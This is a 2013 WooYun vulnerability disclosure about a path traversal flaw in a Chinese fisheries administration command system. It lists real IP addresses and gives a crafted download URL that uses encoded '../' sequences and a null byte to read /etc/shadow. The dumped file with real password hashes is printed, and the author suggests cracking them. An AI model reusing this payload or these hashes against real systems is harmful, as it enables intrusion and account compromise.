漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-017221
漏洞标题:中国某渔政系统的安全问题
相关厂商:中国渔政
漏洞作者: superbing
提交时间:2013-01-15 15:17
修复时间:2013-03-01 15:18
公开时间:2013-03-01 15:18
漏洞类型:设计缺陷/逻辑错误
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-01-15: 细节已通知厂商并且等待厂商处理中
2013-01-17: 厂商已经确认,细节仅向厂商公开
2013-01-27: 细节向核心白帽子及相关领域专家公开
2013-02-06: 细节向普通白帽子公开
2013-02-16: 细节向实习白帽子公开
2013-03-01: 细节向公众公开
简要描述:
中国渔政系统的一点问题,快去钓鱼岛巡航吧!加油!
详细说明:
中国渔政几个指挥系统通用的一个洞。
http://202.127.42.208:8083/EOMS_J2EE/
http://202.127.42.208/EOMS_J2EE/
http://202.127.42.208:8080/CFR/
......
以其中一个为例:
原URL:
http://202.127.42.208/EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=2012121111284296.doc&fileatt=2013年系统对外提供服务时间安排_2012121111284296.doc
构造的URL:
http://202.127.42.208/EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E//etc/shadow%00.zip&fileatt=2013年系统对外提供服务时间安排.txt
下载回来的etc/password
root:$1$apqXBjsl$Iey1AIPiiKbyvybIeOkUs0:15392:0:99999:7:::
bin:*:15392:0:99999:7:::
daemon:*:15392:0:99999:7:::
adm:*:15392:0:99999:7:::
lp:*:15392:0:99999:7:::
sync:*:15392:0:99999:7:::
shutdown:*:15392:0:99999:7:::
halt:*:15392:0:99999:7:::
mail:*:15392:0:99999:7:::
news:*:15392:0:99999:7:::
uucp:*:15392:0:99999:7:::
operator:*:15392:0:99999:7:::
games:*:15392:0:99999:7:::
gopher:*:15392:0:99999:7:::
ftp:*:15392:0:99999:7:::
nobody:*:15392:0:99999:7:::
nscd:!!:15392:0:99999:7:::
vcsa:!!:15392:0:99999:7:::
pcap:!!:15392:0:99999:7:::
ntp:!!:15392:0:99999:7:::
rpc:!!:15392:0:99999:7:::
mailnull:!!:15392:0:99999:7:::
smmsp:!!:15392:0:99999:7:::
sshd:!!:15392:0:99999:7:::
rpcuser:!!:15392:0:99999:7:::
nfsnobody:!!:15392:0:99999:7:::
dbus:!!:15392:0:99999:7:::
haldaemon:!!:15392:0:99999:7:::
avahi:!!:15392:0:99999:7:::
avahi-autoipd:!!:15392:0:99999:7:::
apache:!!:15392:0:99999:7:::
xfs:!!:15392:0:99999:7:::
gdm:!!:15392:0:99999:7:::
sabayon:!!:15392:0:99999:7:::
ais:!!:15392:0:99999:7:::
pegasus:!!:15392:0:99999:7:::
piranha:!!:15392:0:99999:7:::
luci:!!:15392:0:99999:7:::
ricci:!!:15392:0:99999:7:::
yiyang:$1$3W3OTUH7$L1a3EtQulgizDnCuKv.wy1:15392:0:99999:7:::
nybzg:$1$MPOyv4LO$ixlYtrswhsekFFNjwZXJD.:15392:0:99999:7:::
关于解密:
密码是用GPU跑也好,CMD5查也好(有几个CMD5可以查到的)。
跑了密码干啥,大家都知道!我就不搞了。只为了点分数。
漏洞证明:
修复方案:
专家比我懂!!!
版权声明:转载请注明来源 superbing@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2013-01-17 09:46
厂商回复:
CNVD确认并复现所述情况,已转由CNCERT协调涉事单位处置。
综合rank=5
最新状态:
暂无